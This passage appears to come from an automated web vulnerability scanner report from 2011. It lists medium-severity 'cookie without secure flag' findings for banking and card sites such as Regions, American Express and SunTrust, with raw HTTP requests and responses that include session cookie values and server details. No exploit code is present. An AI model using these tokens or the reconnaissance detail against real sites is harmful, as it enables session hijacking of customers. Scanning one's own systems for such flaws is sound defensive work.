The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: onlineimagelockbox.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 15:53:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Set-Cookie: ASP.NET_SessionId=hhutcomqadtocl45degfdjjf; path=/; secure; HttpOnly
Set-Cookie: .ASPXFORMSAUTH=; expires=Tue, 12-Oct-1999 05:00:00 GMT; path=/; secure; HttpOnly
Set-Cookie: NSC_jnbhfmpdlcpy-qspe-xfc-wjq=ffffffffaf130a1f45525d5f4f58455e445a4a423660;path=/
Set-Cookie: ORA_OAAM_UIO_SessionId=Iz/Bq2jVS/HYC6CeyzqAmxapf3k=; path=/
Keep-Alive: timeout=5, max=84
Connection: Keep-Alive
Set-Cookie: NSC_psbdmfngb-qspyz=ffffffffaf137d9645525d5f4f58455e445a4a423660;path=/
Set-Cookie: rfaft2c1=k7/bNwhCtq/jAdwA9EyADGvLZSwA1; Domain=.regions.com; Path=/; HttpOnly
Set-Cookie: rfaft2c1_.regions.com_%2F_wlf=LkFTUFhGT1JNU0FVVEhf?yCMmZvm9zj6PjaFzZKKhWqDaQ4sA&; Domain=.regions.com; Expires=Wed, 01 Jan 2020 00:00:00 GMT; Path=/; HttpOnly
Set-Cookie: rfaft2c1_.regions.com_%2F_wat=QVNQLk5FVF9TZXNzaW9uSWRf?oIofAIgflLxYTL4OwWcIM/MyLncA&TlNDX2puYmhmbXBkbGNweS1xc3BlLXhmYy13anFf?sjE4MqP5HNW32wfJGQjmFtX1vvAA&T1JBX09BQU1fVUlPX1Nlc3Npb25JZF9f?LVDw7uKv5Su97EdTD6WCH2VIliwA&TlNDX3BzYmRtZm5nYi1xc3B5el9f?QJsyBIV7ZMLO59vA0S4YEVQke/4A&; Domain=.regions.com; Path=/; HttpOnly
X-Expires-Orig: -1
Set-Cookie: NSC_pomjofjnbhfmpdlcpy.sfhjpot.dpn=ffffffffaf130d4445525d5f4f58455e445a4a423660;path=/;secure
Content-Length: 13435


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><title>
   
...[SNIP]...

10.11. https://profile.microsoft.com/RegSysProfileCenter/default.aspx

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://profile.microsoft.com
Path:   /RegSysProfileCenter/default.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /RegSysProfileCenter/default.aspx?lcid=1033 HTTP/1.1
Host: profile.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 14601
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: MicrosoftSessionCookie=Microsoft.CookieId=b2fffb96-3f8b-4cc5-9810-7702b2449a5d&Microsoft.CreationDate=02/03/2011 19:14:57&Microsoft.LastVisitDate=02/03/2011 19:14:57&Microsoft.NumberOfVisits=1&SessionCookie.Id=07F28F36FB368F1F3BC74EDEA40E8AA5; expires=Thu, 03-Feb-2011 19:44:57 GMT; path=/
Set-Cookie: MSID=Microsoft.CreationDate=02/03/2011 19:14:57&Microsoft.LastVisitDate=02/03/2011 19:14:57&Microsoft.VisitStartDate=02/03/2011 19:14:57&Microsoft.CookieId=d3a09828-6600-4bac-b404-cd316bc27b20&Microsoft.TokenId=de207de2-450e-45b1-80d9-51ca6fce9326&Microsoft.NumberOfVisits=1&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0566-0726-0554-7301; domain=.microsoft.com; expires=Fri, 03-Feb-2012 19:14:57 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 19:14:57 GMT


<html dir="LTR" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"/>
<title>
Profile Center
</title>
<link type='te
...[SNIP]...

10.12. https://rewards.americanexpress.com/myca/loyalty/us/rewards/mracctmgmt/acctsumm

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://rewards.americanexpress.com
Path:   /myca/loyalty/us/rewards/mracctmgmt/acctsumm

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /myca/loyalty/us/rewards/mracctmgmt/acctsumm HTTP/1.1
Host: rewards.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 13:47:34 GMT
Server: IBM_HTTP_Server
Set-Cookie: SaneID=10.10.14.1-1296740854766457; Path=/; expires=Sun, 07-Feb-16 13:47:34 GMT; domain=.americanexpress.com
Pragma: no-cache
Expires: Thu, 03 Feb 2011 13:47:34 GMT
LastModified: Thu, 03 Feb 2011 13:47:34 GMT
Set-Cookie: JSESSIONID=0000WcKVkTP27hcngy59gW5Udt2:14eu0u9ia; Path=/
Cache-Control: no-store, no-cache=set-cookie
Set-Cookie: NSC_nf3-x-sx-bddu-b=ffffffff97a3d15845525d5f4f58455e445a4a42ba91;path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Connection: close
Set-Cookie: sroute=856558090.58148.0000; path=/
Vary: Accept-Encoding, User-Agent
Content-Length: 48745


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en">
<head>
<title>
American Express - Mem
...[SNIP]...

10.13. https://secure.opinionlab.com/comment20AMX.asp

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.opinionlab.com
Path:   /comment20AMX.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /comment20AMX.asp?time1= HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 6067
Content-Type: text/html; Charset=UTF-8
Set-Cookie: ASPSESSIONIDCQBRBBCR=MFJLFHCBMHKCEOMCNICCPKPP; path=/
Date: Thu, 03 Feb 2011 13:47:40 GMT
Connection: close

<!--TEMPLATE version 3.6.1 UNIVERSAL CSS: 0--><html>
<head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-16">
<base href="https://secure.opinionlab.com/ccc01">
<title>Comment Ca
...[SNIP]...

10.14. https://secure.thepaymentwindow.com/epayments/default.asp

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.thepaymentwindow.com
Path:   /epayments/default.asp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /epayments/default.asp HTTP/1.1
Host: secure.thepaymentwindow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Date: Thu, 03 Feb 2011 15:51:15 GMT
X-Powered-By: ASP.NET
Connection: close
Content-Length: 297
Content-Type: text/html
Set-Cookie: mySession=c3d8cbcb%2D179f%2D45ab%2D8d5e%2D6201d0b9c5e5; path=/epayments
Cache-control: private
Server: Unknown Web Server
Set-Cookie: TLTSID=957CA41D4A7F550937527C8B9C274358; path=/

<font face="Arial" size=2>
<p>Microsoft VBScript runtime </font> <font face="Arial" size=2>error '800a000d'</font>
<p>
<font face="Arial" size=2>Type mismatch: '[string: &quot;&quot;]'</font>
<p>
<fo
...[SNIP]...

10.15. https://securebank.regions.com/ForgottenPassword.aspx

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://securebank.regions.com
Path:   /ForgottenPassword.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ForgottenPassword.aspx HTTP/1.1
Host: securebank.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: securebank.regions.com-https=R851515607; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:51:16 GMT
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@amsouth.com" on "2006.10.30T12:53-0600" exp "2020.10.30T12:00-0600" r (v 0 s 0 n 0 l 0))
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: ASP.NET_SessionId=v44xql55xf30pojhjmjotu55; path=/
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 15697


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<HTML>
<HEAD>
       <title>Regions Online Banking</title>
       <link href="styles/styles.
...[SNIP]...

10.16. https://securebank.regions.com/login.aspx

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://securebank.regions.com
Path:   /login.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /login.aspx HTTP/1.1
Host: securebank.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: securebank.regions.com-https=R929786393; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:51:17 GMT
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@amsouth.com" on "2006.10.30T12:53-0600" exp "2020.10.30T12:00-0600" r (v 0 s 0 n 0 l 0))
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: ASP.NET_SessionId=zcov5huv0navdtav2ahkib55; path=/
Set-Cookie: vwsli=true; path=/
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 12024


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<HTML>
<HEAD>
       <title>Regions Online Banking</title>
       <link href="styles/styles.
...[SNIP]...

10.17. https://www.consumercardaccess.com/main/spectrum/Home

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.consumercardaccess.com
Path:   /main/spectrum/Home

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /main/spectrum/Home HTTP/1.1
Host: www.consumercardaccess.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 03 Feb 2011 15:55:00 GMT
Content-type: text/html;charset=ISO-8859-1
Cache-control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Set-cookie: JSESSIONID=03568F1802F7F86AA5F163DABD5F16ED;Path=/
Set-cookie: language=en;Path=/
Set-cookie: language=en;Path=/
Connection: close
Set-Cookie: NSC_ttm-dpotvnfsdbsebddftt=ffffffffc3a0626e45525d5f4f58455e445a4a4233c1;path=/;secure


<html>
   <head>
       <meta http-equiv='pragma' content='no-cache'/>
       <meta http-equiv='Cache-Control' content='no-cache'/>
       <meta http-equiv='Expires' content='0'/>    
       <LINK rel="stylesheet" hre
...[SNIP]...

10.18. https://www.morgankeegan.com/ca/mkca.aspx

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.morgankeegan.com
Path:   /ca/mkca.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ca/mkca.aspx HTTP/1.1
Host: www.morgankeegan.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Connection: close
Date: Thu, 03 Feb 2011 15:55:15 GMT
Content-Length: 17005
Content-Type: text/html; charset=utf-8
X-Powered-By: Morgan Keegan Ingenuity
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: ASP.NET_SessionId=r0mds0551s2n1suardxkio2o; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<HTML lang="en">
   <HEAD>
       <title>Client Access :: Morgan Keegan</title>
       <META h
...[SNIP]...

10.19. https://www.planservices.com/regions/

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.planservices.com
Path:   /regions/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /regions/ HTTP/1.1
Host: www.planservices.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Expires: 01 Nov 1990 01:00:01 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT",policyref=/w3c/p3p.xml
Set-Cookie: TESTCOOKIES=Test;expires=Sat, 26-Jan-2041 15:50:37 GMT;path=/
Set-Cookie: CFID=48347521;expires=Sat, 26-Jan-2041 15:50:37 GMT;path=/
Set-Cookie: CFTOKEN=16733687;expires=Sat, 26-Jan-2041 15:50:37 GMT;path=/
Set-Cookie: JSESSIONID=0430c25d29c2403f45f2TR;path=/
Set-Cookie: PLANID=;path=/
Set-Cookie: GROUPID=;path=/
Set-Cookie: IID=;path=/
Set-Cookie: WEBUSAGE=105037;path=/
Set-Cookie: USERINTERNAL=0;path=/
Set-Cookie: VIRTDIR=regions;path=/
Date: Thu, 03 Feb 2011 15:50:36 GMT
Connection: close


<style type="text/css">
   .BoldText {font-weight:bold; font-size:12px;}
   .WebAdminSortHeader {font-weight:bold; font-size:12px;}
   .WebAdminText {font-size:11px}
   .btnArrow {width: 20px; vertical-
...[SNIP]...

10.20. https://www.regions.com/personal_banking.rf

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.regions.com
Path:   /personal_banking.rf

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /personal_banking.rf HTTP/1.1
Host: www.regions.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www.regions.com-http=R1402660298

Response

HTTP/1.1 200 OK
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Cache-Control: private
Date: Thu, 03 Feb 2011 15:49:15 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=phjubd2yvc5erifye2te4a55; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 25978


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...

10.21. https://www.sponsorinsight.com/regions/index.cfm

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.sponsorinsight.com
Path:   /regions/index.cfm

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /regions/index.cfm HTTP/1.1
Host: www.sponsorinsight.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Location: Logon.cfm
Set-Cookie: CFID=44771633;expires=Sat, 26-Jan-2041 15:50:38 GMT;path=/
Set-Cookie: CFTOKEN=92674862;expires=Sat, 26-Jan-2041 15:50:38 GMT;path=/
Set-Cookie: JSESSIONID=1430e30c48d8543b222cTR;path=/
Set-Cookie: USERINTERNAL=0;path=/
Set-Cookie: SUSR=;path=/
Set-Cookie: SPRF=;path=/
Set-Cookie: SPLN=;path=/
Set-Cookie: SWU=105038j0;path=/
Set-Cookie: SSTP=0;path=/
Date: Thu, 03 Feb 2011 15:50:37 GMT
Connection: close

<META HTTP-EQUIV="PRAGMA" CONTENT="no-cache">

10.22. https://www.suntrust.com/portal/server.pt

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.suntrust.com
Path:   /portal/server.pt

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /portal/server.pt?space=CommunityPage&control=SetCommunity&PageID=0&CommunityID=305&cid=PS-PSRC-RT-BING-00033319 HTTP/1.1
Host: www.suntrust.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 13:42:21 GMT
Server: Microsoft-IIS/6.0
Host-Name: P13F
X-Powered-By: ASP.NET
Pragma: no-cache
Content-Language: en
Set-Cookie: ASP.NET_SessionId=jqj5n545nhrvfvbrsxhkuq45; path=/; HttpOnly
Expires: 1296654141940
Cache-Control: no-store, no-cache, must-revalidate, max-age=0, post-check=0, pre-check=0
Last-Modified: 1296740541940
Content-Type: text/html; charset=utf-8
Set-Cookie: BIGipServerwww.suntrust.com-pvic=1067582474.20480.0000; path=/
Vary: Accept-Encoding, User-Agent
Content-Length: 73462

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:pt="http://www.plumtree.com/xmlschemas/ptui/">
<!-- This page uses the base page layo
...[SNIP]...

10.23. https://www124.americanexpress.com/cards/benefits/

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www124.americanexpress.com
Path:   /cards/benefits/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cards/benefits/ HTTP/1.1
Host: www124.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:13:21 GMT
Server: IBM_HTTP_Server
Set-Cookie: SaneID=173.193.214.243-1296742401135944; path=/; expires=Sun, 07-Feb-16 14:13:21 GMT; domain=.americanexpress.com
Set-Cookie: JSESSIONID=0000TKqZC3FBtwwLR7ggzow9W6Y:vh7pui00;Path=/
Cache-Control: no-cache="set-cookie,set-cookie2"
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 33942


<!-- AMU Integration Imports -->


<HTML>
<HEAD>
<TITLE>Credit Card Services & Benefits - Credit Card Protection | American Express</TITLE>
<META name="description" content="In addition to the excl
...[SNIP]...

10.24. https://www201.americanexpress.com/MobileWeb/index.jsp

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www201.americanexpress.com
Path:   /MobileWeb/index.jsp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /MobileWeb/index.jsp HTTP/1.1
Host: www201.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:08:19 GMT
Server: IBM_HTTP_Server
Set-Cookie: SaneID=173.193.214.243-1296742099864083; path=/; expires=Sun, 07-Feb-16 14:08:19 GMT; domain=.americanexpress.com
Set-Cookie: JSESSIONID=0001tRlF96bogoCEk-GWeNUtldM:11m137ri1;Path=/
Cache-Control: no-cache="set-cookie,set-cookie2"
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 33070

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Co
...[SNIP]...

10.25. https://www201.americanexpress.com/cards/DecodeServlet

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www201.americanexpress.com
Path:   /cards/DecodeServlet

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cards/DecodeServlet HTTP/1.1
Host: www201.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000OWl25Hw-p5p9o_dRR-NwERg:1115nbqmn; SaneID=173.193.214.243-1296742163652146;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:15:11 GMT
Server: IBM_HTTP_Server
Set-Cookie: JSESSIONID=0000sCj6t9Hna1rccUoRjq-IM24:10ue6mp18;Path=/
Pragma: No-cache
Cache-Control: no-cache,no-store,max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 0
Connection: close
Content-Type: text/html
Content-Language: en-US


10.26. https://www201.americanexpress.com/secure/my-special-offers

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www201.americanexpress.com
Path:   /secure/my-special-offers

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /secure/my-special-offers HTTP/1.1
Host: www201.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000OWl25Hw-p5p9o_dRR-NwERg:1115nbqmn; SaneID=173.193.214.243-1296742163652146;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:15:16 GMT
Server: IBM_HTTP_Server
Set-Cookie: JSESSIONID=0000I-vPqmYD-VFlGwhjjEv6j4o:10ue6mp18;Path=/
Cache-Control: no-cache="set-cookie,set-cookie2"
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 60273

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
<script src="h
...[SNIP]...

10.27. https://www201.americanexpress.com/smsweb/un_Landing.do

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www201.americanexpress.com
Path:   /smsweb/un_Landing.do

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /smsweb/un_Landing.do HTTP/1.1
Host: www201.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0001CVQ7-fOs0FkadFJVEKHB1-6:11m1380s8; SaneID=173.193.214.243-1296742163652146; SIFR-PREFETCHED=true;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:26:17 GMT
Server: IBM_HTTP_Server
Set-Cookie: JSESSIONID=0000sVlsrVbPIB1cvLVnVyWfqn8:11nugl6hc;Path=/
Set-Cookie: JSESSIONID=0000eNOeOQ3Hspgrd77PseRgXZw:11nugl6hc;Path=/
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 32927


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
<meta http-equiv="Content-type"
...[SNIP]...

10.28. https://www209.americanexpress.com/merchant/marketing-data/pages/home

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www209.americanexpress.com
Path:   /merchant/marketing-data/pages/home

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /merchant/marketing-data/pages/home HTTP/1.1
Host: www209.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:08:20 GMT
Server: IBM_HTTP_Server
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: mertkit_JSESSIONID=0000TzQ53Y5cTtY7bAicAgzlKan:15bvkorqu; Path=/
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Set-Cookie: BIGipServerwww260-443=873204234.47873.0000; path=/
Content-Length: 67227

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...

10.29. https://www212.americanexpress.com/dsmlive/dsm/OnlineSelf-Services/ConsumerLanding.do

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www212.americanexpress.com
Path:   /dsmlive/dsm/OnlineSelf-Services/ConsumerLanding.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dsmlive/dsm/OnlineSelf-Services/ConsumerLanding.do HTTP/1.1
Host: www212.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:08:26 GMT
Server: IBM_HTTP_Server
Set-Cookie: dsmLive_JSESSIONID=0000bW6uKYN7VFONJWqjrLhrVkp:14qpqp2b7; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 13749


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">


...[SNIP]...

10.30. https://www212.americanexpress.com/dsmlive/dsm/dom/us/en/fraudprotectioncenter/fraudprotectioncenter_homepage.do

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www212.americanexpress.com
Path:   /dsmlive/dsm/dom/us/en/fraudprotectioncenter/fraudprotectioncenter_homepage.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

